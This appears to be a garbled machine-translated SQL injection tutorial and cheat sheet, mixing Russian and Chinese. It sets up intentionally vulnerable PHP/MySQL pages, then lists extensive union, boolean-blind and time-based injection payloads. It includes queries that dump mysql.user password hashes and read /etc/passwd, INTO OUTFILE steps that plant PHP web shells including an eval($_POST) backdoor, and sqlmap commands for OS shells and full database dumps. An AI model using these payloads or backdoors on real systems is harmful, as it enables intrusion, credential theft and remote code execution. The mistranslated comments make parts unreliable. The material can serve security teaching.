[root@localhost ~]# yum install -y httpd httpd-devel \
mariadb mariadb-server mysql-devel \
php php-mysql php-common php-gd php-xml

[root@localhost ~]# systemctl restart httpd
[root@localhost ~]# systemctl restart mariadb
[root@localhost ~]# systemctl enable httpd
[root@localhost ~]# systemctl enable mariadb

[root@localhost ~]# mysql -uroot -p1233

MariaDB [(none)]> create database lyshark;
Query OK, 1 row affected (0.01 sec)
MariaDB [(none)]> use lyshark;
Database changed

MariaDB [lyshark]> create table lyshark (
    -> id int(10) not null,
    -> title varchar(1000) not null,
    -> text varchar(2000) not null
    -> );
Query OK, 0 rows affected (0.02 sec)

MariaDB [lyshark]> create table user(id int ,name char(30),pass char(40));
MariaDB [lyshark]> create table pwd(id int ,name char(30),pass char(40));

insert into `lyshark` (`id`, `title`, `text`) values (1,'admin','hello admin');
insert into `lyshark` (`id`, `title`, `text`) values (2,'lyshark','hello lyshark');
insert into `lyshark` (`id`, `title`, `text`) values (3,'guest','hello guest');

[root@localhost ~]# setenforce 0
[root@localhost ~]# iptables -F
[root@localhost ~]#
[root@localhost ~]# vim /var/www/html/index.php

<?php
	$id = $_GET['id'];
	$connection = mysql_connect("127.0.0.1","root","1233");
	mysql_select_db("lyshark",$connection);
	$myquery = "select * from lyshark where id=$id";
	$result = mysql_query($myquery);
	while($row = mysql_fetch_array($result)){
		echo "серийный номер: ".$row['id']."<br >";
		echo "заголовок: ".$row['title']."<br >";
		echo "содержание: ".$row['text']."<br >";
		echo "<hr>";
	}
	mysql_close($connection);
	echo «Операторы SQL, выполняемые в фоновом режиме: ".$myquery."<hr>";
	#mysql_free_result($result);
?>

[root@localhost ~]# chmod 755 -R /var/www/html/index.php
[root@localhost ~]# chown apache.apache /var/www/html/index.php
[root@localhost ~]# systemctl restart httpd

[root@localhost ~]# curl http://127.0.0.1/index.php?id=1
[root@localhost ~]# curl http://127.0.0.1/index.php?id=2

[root@localhost ~]# curl http://127.0.0.1/index.php?id=1'

SQL-оператор выполнен: select * from lyshark where id=1'

[root@localhost ~]# curl http://127.0.0.1/index.php?id=1 and 1=1
SQL-оператор выполнен: select * from lyshark where id=1 and 1=1

--------------------------------------------------------------
[root@localhost ~]# curl http://127.0.0.1/index.php?id=1 and 1=0
SQL-оператор выполнен: select * from lyshark where id=1 and 1=0

[root@localhost ~]# curl http://192.168.1.11/index.php?id=1 or 1=1
SQL-оператор выполнен: select * from lyshark where id=1 and 1=1

--------------------------------------------------------------
[root@localhost ~]# curl http://192.168.1.11/index.php?id=1 or 1=0
SQL-оператор выполнен: select * from lyshark where id=1 and 1=0

[root@localhost ~]# curl http://127.0.0.1/index.php?id=1%2b1

SQL-оператор выполнен: select * from lyshark where id=1+1

[root@localhost ~]# curl http://127.0.0.1/index.php?id=2-1

SQL-оператор выполнен: select * from lyshark where id=2-1

index.php?id=1 and ord(mid(user(),1,1)) = 114

index.php?id=1 and(select count(*) from mysql.user) > 0

index.php?id=1 union select host,user,password from mysql.user#                   // Версии до 5.6
index.php?id=1 union select host,user,authentication_string from mysql.user#      // 5.7 и более поздние версии

index.php?id=1 union select 1,1,load_file("/etc/passwd") into outfile '/var/www/html/a.txt'
index.php?id=1 union select null,null,"<?php phpinfo();?>"  into outfile '/var/www/html/a.php'
index.php?id=1 union select 1,1,load_file(char(111,116,46,105,110,105))

index.php?id=1 union select 1,1,load_file("/etc/passwd")       // Загрузить указанный файл
index.php?id=1 union select 1,1,@@datadir                      // суждениебаза данных目录
index.php?id=1 union select 1,1,@@basedir                      // Определите корневой путь установки
index.php?id=1 union select 1,1,@@hostname                     // Определить имя хоста
index.php?id=1 union select 1,1,@@version                      // суждениебаза данных Версия

index.php?id=1 union select 1,1,@@version_compile_os           // Определить тип системы (Linux)
index.php?id=1 union select 1,1,@@version_compile_machine      // Архитектура системы судейства (x86)

index.php?id=1 union select 1,1,user()                         // Разоблачение пользователей системы
index.php?id=1 union select 1,1,database()                     // Выставить текущую базу данных

index.php?id=1 and 1=1 union select 1,2

SQL-оператор выполнен: select * from lyshark where id=1 and 1=1 union select 1,2

index.php?id=1 and 1=1 union select 1,2,3

SQL-оператор выполнен: select * from lyshark where id=1 and 1=1 union select 1,2,3

index.php?id=1 and 1=1 union select 1,2,3,4

SQL-оператор выполнен: select * from lyshark where id=1 and 1=1 union select 1,2,3,4

index.php?id=1 and 1=1 union select null,null,null #

SQL-оператор выполнен: select * from lyshark where id=1 and 1=1 union select null,null,null

index.php?id=1 order by 4 #

index.php?id=1 order by 3 #

index.php?id=1 and 0 union select null,null,null

SQL-оператор выполнен: select * from lyshark where id=1 and 0 union select null,null,null

index.php?id=1 union select null,null,null limit 1,1

SQL-оператор выполнен: select * from lyshark where id=1 union select null,null,null limit 1,1

index.php?id=1 and 0 union select 1,1,database()

index.php?id=1 and 0 union select 1,1,schema_name from information_schema.schemata

index.php?id=1 union select null,null,schema_name from information_schema.schemata limit 0,1

index.php?id=1 and 0 union select null,null,schema_name from information_schema.schemata limit 0,1

index.php?id=1 and 0 union select null,schema_name,null from information_schema.schemata limit 1,1
index.php?id=1 and 0 union select null,schema_name,null from information_schema.schemata limit 2,1
index.php?id=1 and 0 union select null,schema_name,null from information_schema.schemata limit 3,1

index.php?id=1 and 0 union select 1,1,group_concat(table_name) 
>                    from information_schema.tables where table_schema='lyshark'  #checklyshark библиотека серединаимя таблицысказать

index.php?id=1 and 0 union select 1,1,table_name
>                    from information_schema.tables where table_schema='lyshark'  #checklyshark библиотека серединаимя таблицысказать

index.php?id=1 and 1=1 union select 1,1,group_concat(column_name)
>              from information_schema.columns
>              where table_schema='lyshark' and table_name='lyshark'

index.php?id=1 and 1=1 union select 1,1,group_concat(column_name)
>              from information_schema.columns
>              where table_schema='mysql' and table_name='user'

index.php?id=2 union select null,null,column_name
>              from information_schema.columns
>              where table_schema='mysql' and table_name='user'

index.php?id=1 union select Host,User,Password from mysql.user

index.php?id=1 and 1=1 union select 1,1,group_concat(id,title,text) from lyshark

index.php?id=1 and 1=1 union select 1,1,group_concat(Host,User,Password) from mysql.user

$query="select first_name from users where id='$_GET['id']'";

1' union select database() #;

select first_name from users where id='1'union select database()#'

select * from tables where idproduct=’ 13’;
select * from tables where name=’ fendo’;
select * from tables where data=’ 01/01/2017’;

vim /var/www/html/index.php

<?php
$name=$_GET['username'];
$conn=mysql_connect("127.0.0.1","root","1233");

mysql_select_db('fendo',$conn);
$sql="select * from user where username = '$name'";
$result=mysql_query($sql);

	while($row = mysql_fetch_array($result)){
		echo "пользовательID：".$row['id']."<br >";
		echo "пользовательимя：".$row['username']."<br >";
		echo "пользователь密码：".$row['password']."<br >";
		echo "пользователь邮箱：".$row['email']."<br >";
		echo "<hr>";
	}

	mysql_close($conn);
	echo "<hr>";
	echo «Операторы SQL, выполняемые в фоновом режиме: "."$sql <br >";
?>

[root@localhost ~]# mysql -uroot -p

MariaDB [(none)]> create database fendo;
MariaDB [(none)]> use fendo;
MariaDB [fendo]> create table user(
    -> id int not null,
    -> username varchar(100) not null,
    -> password varchar(100) not null,
    -> email varchar(200) not null
    -> );
Query OK, 0 rows affected (0.02 sec)

insert into user(id,username,password,email) values(1,'admin','fendo','10010@qq.com');
insert into user(id,username,password,email) values(2,'guest','goods','10020@qq.com');
insert into user(id,username,password,email) values(3,'lyshark','nice','10030@qq.com');

[root@localhost ~]# systemctl restart httpd
[root@localhost ~]# curl http://127.0.0.1/index1.php?username=lyshark

index.php?username=admin' and '1'='1
index.php?username=admin' and '1'='0
index.php?username=admin' and '1'=1--'
index.php?username=admin' or '1'=1--'

index.php?username=admin ' union select 1,1,1 and '1'='1    // Выдается ошибка, поле описания больше 3
index.php?username=admin ' union select 1,1,1,1 and '1'='1  // Отображается правильно, таблица имеет 4 поля.
index.php?username=admin ' union select 1,1,1,1'            // Это также может завершить закрытие оператора
index.php?username=admin ' union select null,null,null,null'

index.php?username=admin' union select database(),1,@@version,@@datadir'
index.php?username=admin' union select database(),1,@@version,@@datadir and '1'='0

index.php?username=admin'+and+(select+count(*)+from+user)>0+and+''='      // Пользователь таблицы существует
index.php?username=admin'+and+(select+count(*)+from+lyshark)>0+and+''='   // Таблица lyshark не существует

index.php?username=admin' union select 1,1,1,group_concat(table_name)
>                  from information_schema.tables where table_schema="fendo"'

index.php?username=admin' union select 1,1,1,group_concat(column_name)
>                  from information_schema.columns where
>                  table_schema="fendo" and table_name="user"'

index.php?username='admin' union select 1,group_concat(password),1,1 from user'
index.php?username='admin' union select id,username,password,email from user'

index.php?id=1 and left(version(),1)=5#        // Вернитесь в нормальное состояние, объясните базу версия данных – 5
index.php?id=1 and left(version(),1)=4#        // Ошибка возврата, база описания версия данных не 5

index.php?id=1 and (length(database())) >=4                    // Угадайте, сколько строк в названии библиотеки

index.php?id=1 and (left(database(),1)) >= 'd'   #              // Угадайте, что первая левая цифра названия библиотеки — d.
index.php?id=1 and (left(database(),2)) >= 'dv'  #              // Угадайте, что первые две цифры слева от названия библиотеки — dv.
index.php?id=1 and (left(database(),3)) >= 'dvw' #              // Угадайте, что первые 3 цифры слева от названия библиотеки — dvw.
index.php?id=1 and (left(database(),4)) >= 'dvwa'#              // Угадайте, что первые 4 цифры слева от названия библиотеки — dvwa.


index.php?id=1' and ord(mid((CAST(DATABASE() AS CHAR)),1,1))=100 #          // Первая позиция – d
index.php?id=1' and ord(mid((CAST(DATABASE() AS CHAR)),2,1))=118 #          // Вторая позиция — v.
index.php?id=1' and ord(mid((CAST(DATABASE() AS CHAR)),3,1))=119 #          // Третья позиция – w
index.php?id=1' and ord(mid((CAST(DATABASE() AS CHAR)),4,1))=97 #           // 4-я позиция – это


mid ((a,b,c)                     // Перехватить позиции от b до c из строки a
ord()                            // Преобразуйте результат в код ascii и сравните его со следующим числовым значением.
CAST(DATABASE() AS CHAR)         // Если данные получены, верните

чиновник: and (select count(*) from название таблицы) >=0

index.php?id=1 and (select count(*) from mysql.user) >=0     // Таблица mysql.user существует.
index.php?id=1 and (select count(*) from lyshark) >=0        // Таблица Lyshark существует

чиновник: and (select count (имя поля) from Угаданное название таблицы)>=0

index.php?id=1 and (select count(id) from users) >=0       // Вернитесь к нормальному состоянию, указав, что поле id существует.
index.php?id=1 and (select count(name) from users) >=0     // Возврат ненормальный, и поле имени не существует.


index.php?id=1 and (select count(*) from lyshark) >=3 #--   // Возвращает количество записей в таблице

index.php?id=1' and (length(user())) >=14 #                // Угадай базу длина имени пользователя
index.php?id=1' and (select user() like 'root%') #         // угадай имя пользователя
index.php?id=1' and (select user() regexp '^[a-z]') #      // Угадай начало от А до Я
index.php?id=1' and (select user() regexp '^r') #          // Первый из них - р.
index.php?id=1' and (select user() regexp '^ro') #         // Вторая цифра — о.
index.php?id=1' and (select user() regexp '^root') #       // и так далеепредполагатьчетверка лучших

index.php?id=1 and sleep(5) #
index.php?id=1 and sleep(5) order by 3 #      // Если полей 3, будет задержка 5 секунд.

index.php?id=1 and select if(length(user())=0,sleep(3),1) #    //Если user=0, задержка 3 секунды
index.php?id=1 and if(hex(mid(user(),1,1))=100,sleep(3),1) #   // Первый символ = d, далее задержка 3 секунды.
index.php?id=1 and if(hex(mid(user(),1,1))=118,sleep(3),1) #   // Второй символ = v задержится на 3 секунды.

sqlmap -u "./index.php?id=1" -v 3                   # Показать полезную нагрузку атаки
sqlmap -u "./index.php?id=1" --level=3              # Укажите уровень обнаружения
sqlmap -u "./index.php?id=1" --privileges           # Проверьте все права пользователя
sqlmap -u "./index.php?id=1" --privileges root      # Проверьте права root-пользователя
sqlmap -u "./index.php?id=1" --all                  # Искать по всей базе данных
sqlmap -u "./index.php?id=1" --hostname             # Запросить текущее имя хоста
sqlmap -u "./index.php?id=1" --is-dba               # Определить root-права
sqlmap -u "./index.php?id=1" --users                # база перечисления данныхпользователь
sqlmap -u "./index.php?id=1" --random-agent         # Случайный пользовательский агент
sqlmap -u "./index.php?id=1" --fingerprint          # Выполнить проверку отпечатков пальцев версии СУБД

sqlmap -u "./index.php?id=1" --output-dir=""        # Пользовательский выходной каталог
sqlmap -u "./index.php?id=1" --file-read=""         # прочитать файл
sqlmap -u "./index.php?id=1" --file-write=""        # операция записи

sqlmap -u "./index.php?id=1" --os-cmd="net user"    # выполнить команду
sqlmap -u "./index.php?id=1" --os-shell             # Интерактивное выполнение команд
sqlmap -u "./index.php?id=1" --sql-query=""         # Оператор SQL выполнен
sqlmap -u "./index.php?id=1" --cookie=""            # Указанный файл cookie
sqlmap -u "./index.php?id=1" --temper=""            # Укажите скрипт фильтра

sqlmap -u "./index.php?id=1" --identify-waf                  # Проверьте, есть ли WAF
sqlmap -u "./index.php?id=1" --current-db                    # Запросить текущую базу данных
sqlmap -u "./index.php?id=1" --current-user                  # Запросить текущее имя хоста
sqlmap -u "./index.php?id=1" --users                         # Запросить все имена пользователей
sqlmap -u "./index.php?id=1" --dbs                           # Перечислить все базы данных
sqlmap -u "./index.php?id=1" --tables                        # Перечислить все таблицы

sqlmap -u "./index.php?id=1" -D "mysql" --tables             # Получить таблицу в библиотеке MySQL.
sqlmap -u "./index.php?id=1" -D "mysql" -T "host" --columns  # Получить имя столбца таблицы mysql.host
sqlmap -u "./index.php?id=1" -D "mysql" -T "host" --dump     # Сохраните mysql.host на локальном компьютере.
sqlmap -u "./index.php?id=1" -D "mysql" --dump-all           # Сними все штаны
sqlmap -u "./index.php?id=1" -D "mysql" -T "user" -C "Host,User,Password" --dump

sqlmap -u "./index.php" -v 3 --cookie id=1 --level 2                        #Определяем точку инъекции
sqlmap -u "./index.php" -v 3 --cookie id=1 --dbs --level 2                  #Предполагатьбаза данныхимя
sqlmap -u "./index.php" -v 3 --cookie id=1 --tables --level 2               #угадай имя таблицы
sqlmap -u "./index.php" -v 3 --cookie id=1 -T имя таблицы --clumns --level 2        #угадай поле
sqlmap -u "./index.php" -v 3 --cookie id=1 -T имя таблицы --clumns --dump --level 2 #угадай контент

1. Откройте целевой адрес в браузере. http:// www.xxx.com /Login.asp
2. Настройте прокси-сервер Burp (127.0.0.1:8080) для перехвата запросов.
3. Нажмите кнопку «Отправить» в форме входа.
4. В это время Burp перехватит наш POST-запрос на вход в систему.
5. Преобразуйте этот запрос на публикацию скопировать в txt и запишите содержимое. id=1&Submit=Submit

sqlmap -r post.txt -p id --dbs
Sqlmap -r post.txt -p id -D mysql --tables
Sqlmap -r post.txt -p id -D mysql -T user --columns
sqlmap -r post.txt -p id -D mysql -T user -C "User,Password" --dump
sqlmap --dbms "mysql" --method "POST" --data "id=1&cat=2"

Sqlmap -u "http://127.0.0.1/index.php" --dbs --delay 1
sqlmap -u "http://127.0.0.1/index.php" --dbs --safe-freq 3

sqlmap -u "http://127.0.0.1/index.php" --thread 10 --identify-waf
sqlmap -u "http://127.0.0.1/index.php" --thread 10 --check-waf
sqlmap -u "http://127.0.0.1/index.php" --dbs --batch --tamper "script.py"
sqlmap -u "http://127.0.0.1/index.php" --dbs --batch --tamper "script.py,space2dash.py"

drop database if exists lyshark;
create database lyshark;
use lyshark;
drop table if exists users;
create table users(
	id int(10) primary key not null,
	username varchar(100) not null,
	password varchar(100) not null,
	usremail varchar(100) not null,
	usertype int(1) default 0
);
insert into lyshark.users(id,username,password,usremail) VALUES(1,"admin",md5("123123"),"admin@163.com");
insert into lyshark.users(id,username,password,usremail) VALUES(2,"lyshark",md5("adsdfw2345"),"lyshark@163.com");
insert into lyshark.users(id,username,password,usremail) VALUES(3,"guest",md5("12345678"),"guest@126.com");
insert into lyshark.users(id,username,password,usremail) VALUES(4,"Dumb",md5("458322456"),"Dumb@blib.com");
insert into lyshark.users(id,username,password,usremail) VALUES(5,"Angelina",md5("GIs92834"),"angelina@mkic.com");
insert into lyshark.users(id,username,password,usremail) VALUES(6,"Dummy",md5("HIQWu28934"),"dummy@cboos.com");
insert into lyshark.users(id,username,password,usremail) VALUES(7,"batman",md5("suw&*("),"batmain@gmail.com");
insert into lyshark.users(id,username,password,usremail) VALUES(8,"dhakkan",md5("swui16834"),"dhakakan@umail.com");
insert into lyshark.users(id,username,password,usremail) VALUES(9,"nacki",md5("fsie92*("),"cbooks@emial.com");
insert into lyshark.users(id,username,password,usremail) VALUES(10,"wuhaxp",md5("sadwq"),"cookiec@345.com");

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="gbk">
    <title>SQL инъекция测试代码</title>
</head>
	<?php
	$connect = mysqli_connect("localhost","root","123456","lyshark");
	if($connect)
	{
	        $id = $_GET['id'];
	        if(isset($id))
	        {
	                $sql = "select * from users where id='$id' limit 0,1";
	                $query = mysqli_query($connect,$sql);
	                $row = mysqli_fetch_array($query);
	        }
	}
	?>
<body>
	<table border="1">
	   <tr>
	          <th>серийный номер</th><th>пользователь账号</th><th>пользователь密码</th><th>пользователь邮箱</th><th>Разрешения</th>
	   </tr>
	   <tr>
	          <td><?php echo $row['id']; ?></td>
	          <td><?php echo $row['username']; ?></td>
	          <td><?php echo $row['password']; ?></td>
	          <td><?php echo $row['usremail']; ?></td>
	          <td><?php echo $row['usertype']; ?></td>
	   </tr>
	</table>
	<?php echo '<hr><b> Бэкэнд выполняет операторы SQL:  </b>' . $sql;  ?>
</body>
</html>

index.php?id=1' and 1=1 --+    # Отправить и оценить инъекцию
index.php?id=1' and 1=0 --+
index.php?id=1%2b1             # Отправить плюс подписать решение
index.php?id=2-1               # Отправить знак минуса для инъекции суждения
index.php?id=1 and sleep(5)    # Отложенное суждение, такое как точка

# -----------------------------------------------------------------------------------
# Определите разрешение ROOT: определите, имеет ли база данных разрешение ROOT. Если возвращается результат запроса, это означает, что у нее есть разрешение.
index.php?id=1' and ord(mid(user(),1,1)) = 114 --+

# -----------------------------------------------------------------------------------
# Определите размер разрешений: Если результат возвращается нормально, это означает, что у вас есть права на чтение и запись. Если возвращается ошибка, администратор должен предоставить базу. данные аккаунта понижены.
index.php?id=1' and(select count(*) from mysql.user) > 0

# -----------------------------------------------------------------------------------
# Запросите пароль управления: Запросите пароль управления MySQL. Предупреждающий знак в конце # здесь означает символ комментария, указывающий, что все, что следует за ним, является комментарием.
index.php?id=1' and 0 union select 1,host,user,password,5 from mysql.user --+                // Версии до 5.6
index.php?id=1' and 0 union select 1,host,user,authentication_string,5 from mysql.user --+   // 5.7 и более поздние версии

# -----------------------------------------------------------------------------------
# Напишите предложение на основной сайт: Можно написать бэкдор, состоящий из одного предложения, но каталог должен иметь разрешения на чтение, запись и выполнение в системе Linux.
index.php?id=1' and 0 union select 1,load_file("/etc/passwd"),3,4,5 --+
index.php?id=1' union select 1,load_file("/etc/passwd"),3,4,5 into outfile '/var/www/html/a.txt'--+
index.php?id=1' union select 1,"<?php phpinfo();?>",3,4,5 into outfile '/var/www/html/shell.php' --+
index.php?id=1' union select 1,2,3,4,load_file(char(11,116,46,105,110,105)) into outfile '/var/www/html/b.txt' --+

# -----------------------------------------------------------------------------------
# Используйте движок MySQL, чтобы написать предложение: Используя механизм хранения MySQL, напишите предложение как MySQL
create table shell(cmd text);
insert into shell(cmd) values('<?php @eval($_POST[cmd]) ?>');
select cmd from shell into outfile('/var/www/html/eval.php');

# -----------------------------------------------------------------------------------
# Часто используемые операторы оценки: Ниже приведены некоторые часто используемые операторы запроса на внедрение, включая конфиденциальные операции, такие как запрос имен хостов.
index.php?id=1' union select 1,1,load_file("/etc/passwd")       // Загрузить указанный файл
index.php?id=1' union select 1,1,@@datadir                      // суждениебаза данных目录
index.php?id=1' union select 1,1,@@basedir                      // Определите корневой путь установки
index.php?id=1' union select 1,1,@@hostname                     // Определить имя хоста
index.php?id=1' union select 1,1,@@version                      // суждениебаза данных Версия
index.php?id=1' union select 1,1,@@version_compile_os           // Определить тип системы (Linux)
index.php?id=1' union select 1,1,@@version_compile_machine      // Архитектура системы судейства (x86)
index.php?id=1' union select 1,1,user()                         // Разоблачение пользователей системы
index.php?id=1' union select 1,1,database()                     // Выставить текущую базу данных

index.php?id=1' and 1=1 union select 1,2,3,4 --+

index.php?id=1' and 1=1 union select 1,2,3,4,5 --+
index.php?id=1' and 1=1 union select null,null,null,null,null --+

index.php?id=1' and 1=1 order by 6 --+

index.php?id=1' and 1=1 order by 5 --+

index.php?id=1' and 0 union select null,null,null,null,null --+

index.php?id=1' union select null,null,null,null,null limit 1,1 --+

index.php?id=1' and 0 union select 1,1,database(),1,1 --+        // Найти текущую библиотеку

# -----------------------------------------------------------------------------------
# под контролем limit 0,1,2,3...., можно получить указанное количество баз данныхимясказать.

index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 0,1 --+
index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 1,1 --+
index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 2,1 --+

index.php?id=1' and 0 union select 1,2,group_concat(table_name),4,5
> from information_schema.tables where table_schema='lyshark' --+                  // проверятьlysharkбиблиотекаимя таблицысказать

index.php?id=1' and 0 union select 1,2,table_name,4,5
> from information_schema.tables where table_schema='lyshark' limit 0,1 --+        // проверятьlysharkбиблиотекаимя таблицысказать

index.php?id=1' and 0 union select 1,2,table_name,4,5
> from information_schema.tables where table_schema='lyshark' limit 1,1 --+        // проверятьlysharkбиблиотекаимя таблицысказать

# -----------------------------------------------------------------------------------
index.php?id=1' and 0 union select 1,1,group_concat(column_name),4,5
>              from information_schema.columns
>              where table_schema='lyshark' and table_name='lyshark' --+

# -----------------------------------------------------------------------------------
# Вы также можете просмотреть поля в пользовательской таблице библиотеки MySQL и выполнить запрос.
index.php?id=1' and 0 union select 1,1,group_concat(column_name),4,5
>              from information_schema.columns
>              where table_schema='mysql' and table_name='user' --+

index.php?id=1' and 0 union select 1,1,column_name,4,5
>              from information_schema.columns
>              where table_schema='mysql' and table_name='user' limit 0,1 --+

index.php?id=1' and 0 union select 1,Host,Password,4,5 from mysql.user limit 0,1--+   // Опрос первого пользователя
index.php?id=1' and 0 union select 1,Host,Password,4,5 from mysql.user limit 1,1--+   // Запрос второго пользователя
index.php?id=1' and 0 union select 1,2,3,group_concat(id,username),5 from lyshark.users --+

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="gbk">
    <title>SQL инъекция测试代码</title>
</head>
        <?php
        $connect = mysqli_connect("localhost","root","123","lyshark");
        if($connect)
        {
                $id = $_GET['id'];
                if(isset($id))
                {
                        $sql = "select * from users where id='$id' limit 0,1";
                        $query = mysqli_query($connect,$sql);
                        $row = mysqli_fetch_array($query);
                        if(!empty($row))
                        {
                                print("Запрос завершен..");
                        }else
                        {
                                print("Ошибка запроса");
                        }
                }
        }
        ?>
<body>
        <?php echo '<hr><b> Бэкэнд выполняет операторы SQL:  </b>' . $sql;  ?>
</body>
</html>

index.php?id=1' and left(version(),1)=5 --+            // Возвращается в нормальное состояние, указывая, что номер версии равен 5.
index.php?id=1' and (length(database()))=7 --+         // Вернитесь в нормальное состояние, объясните базу Длина имени данных равна 7

index.php?id=1' and (left(database(),1))='l' --+       // Вернитесь в нормальное состояние, объясните базу Первая цифра данных — l
index.php?id=1' and (left(database(),2))='ly' --+      // Вернитесь в нормальное состояние, объясните базу Первые две цифры данных — ly и так далее.

index.php?id=1' and ord(mid((CAST(database() AS CHAR)),1,1))=108 --+  // Проверьте, является ли первая цифра l
index.php?id=1' and ord(mid((CAST(database() AS CHAR)),2,1))=121 --+ // Проверяем, равна ли вторая цифра y,и так далее

index.php?id=1' and (select count(*) from mysql.user) >=0     // Таблица mysql.user существует.
index.php?id=1' and (select count(*) from lyshark) >=0        // Таблица Lyshark существует

index.php?id=1' and (select count(id) from users) >=0       // Вернитесь к нормальному состоянию, указав, что поле id существует.
index.php?id=1' and (select count(name) from users) >=0     // Возврат ненормальный, и поле имени не существует.
index.php?id=1' and (select count(*) from lyshark) >=3 #--   // Возвращает количество записей в таблице

index.php?id=1' and (length(user())) >=14 #                // Угадай базу длина имени пользователя
index.php?id=1' and (select user() like 'root%') #         // угадай имя пользователя
index.php?id=1' and (select user() regexp '^[a-z]') #      // Угадай начало от А до Я
index.php?id=1' and (select user() regexp '^r') #          // Первый из них - р.
index.php?id=1' and (select user() regexp '^ro') #         // Вторая цифра — о.
index.php?id=1' and (select user() regexp '^root') #       // и так далеепредполагатьчетверка лучших

index.php?id=1' and sleep(5) #
index.php?id=1' and sleep(5) order by 3 #                       // Если полей 3, будет задержка 5 секунд.
index.php?id=1' and select if(length(user())=0,sleep(3),1) #    //Если user=0, задержка 3 секунды
index.php?id=1' and if(hex(mid(user(),1,1))=100,sleep(3),1) #   // Первый символ = d, далее задержка 3 секунды.
index.php?id=1' and if(hex(mid(user(),1,1))=118,sleep(3),1) #   // Второй символ = v задержится на 3 секунды.

sqlmap -u "./index.php?id=1" -v 3                   # Показать полезную нагрузку атаки
sqlmap -u "./index.php?id=1" --level=3              # Укажите уровень обнаружения
sqlmap -u "./index.php?id=1" --privileges           # Проверьте все права пользователя
sqlmap -u "./index.php?id=1" --privileges root      # Проверьте права root-пользователя
sqlmap -u "./index.php?id=1" --all                  # Искать по всей базе данных
sqlmap -u "./index.php?id=1" --hostname             # Запросить текущее имя хоста
sqlmap -u "./index.php?id=1" --is-dba               # Определить root-права
sqlmap -u "./index.php?id=1" --users                # база перечисления данныхпользователь
sqlmap -u "./index.php?id=1" --random-agent         # Случайный пользовательский агент
sqlmap -u "./index.php?id=1" --output-dir=""        # Пользовательский выходной каталог
sqlmap -u "./index.php?id=1" --file-read=""         # прочитать файл
sqlmap -u "./index.php?id=1" --file-write=""        # операция записи
sqlmap -u "./index.php?id=1" --os-cmd="net user"    # выполнить команду
sqlmap -u "./index.php?id=1" --os-shell             # Интерактивное выполнение команд
sqlmap -u "./index.php?id=1" --sql-query=""         # Оператор SQL выполнен
sqlmap -u "./index.php?id=1" --cookie=""            # Указанный файл cookie
sqlmap -u "./index.php?id=1" --temper=""            # Укажите скрипт фильтра
sqlmap -u "./index.php?id=1" --dbs --delay 1        # Ввести после задержки в 1 секунду
sqlmap -u "./index.php?id=1" --dbs --safe-freq 3    # Ввести после задержки в 3 секунды.

sqlmap -u "./index.php?id=1" --identify-waf                  # Проверьте, есть ли WAF
sqlmap -u "./index.php?id=1" --current-db                    # Запросить текущую базу данных
sqlmap -u "./index.php?id=1" --current-user                  # Запросить текущее имя хоста
sqlmap -u "./index.php?id=1" --users                         # Запросить все имена пользователей
sqlmap -u "./index.php?id=1" --dbs                           # Перечислить все базы данных
sqlmap -u "./index.php?id=1" --tables                        # Перечислить все таблицы

sqlmap -u "./index.php?id=1" -D "mysql" --tables             # Получить таблицу в библиотеке MySQL.
sqlmap -u "./index.php?id=1" -D "mysql" -T "host" --columns  # Получить имя столбца таблицы mysql.host
sqlmap -u "./index.php?id=1" -D "mysql" -T "host" --dump     # Сохраните mysql.host на локальном компьютере.
sqlmap -u "./index.php?id=1" -D "mysql" --dump-all           # Сними все штаны
sqlmap -u "./index.php?id=1" -D "mysql" -T "user" -C "Host,User,Password" --dump

sqlmap -u "./index.php" -v 3 --cookie id=1 --level 2                        #Определяем точку инъекции
sqlmap -u "./index.php" -v 3 --cookie id=1 --dbs --level 2                  #Предполагатьбаза данныхимя
sqlmap -u "./index.php" -v 3 --cookie id=1 --tables --level 2               #угадай имя таблицы
sqlmap -u "./index.php" -v 3 --cookie id=1 -T имя таблицы --clumns --level 2        #угадай поле
sqlmap -u "./index.php" -v 3 --cookie id=1 -T имя таблицы --clumns --dump --level 2 #угадай контент

1. Откройте целевой адрес в браузере. http://www.xxx.com/index.php
2. Настройте прокси-сервер Burp (127.0.0.1:8080). Будьте готовы перехватывать запросы
3. Нажмите кнопку «Отправить» в форме войти., или можно использовать другие кнопки
4. В это время Burp перехватит наш POST-запрос на вход в систему.
5. Преобразуйте этот запрос на публикацию скопировать в txt и запишите содержимое. id=1&Submit=Submit

sqlmap -r post.txt -p id --dbs
Sqlmap -r post.txt -p id -D mysql --tables
Sqlmap -r post.txt -p id -D mysql -T user --columns
sqlmap -r post.txt -p id -D mysql -T user -C "User,Password" --dump
sqlmap --dbms "mysql" --method "POST" --data "id=1&cat=2"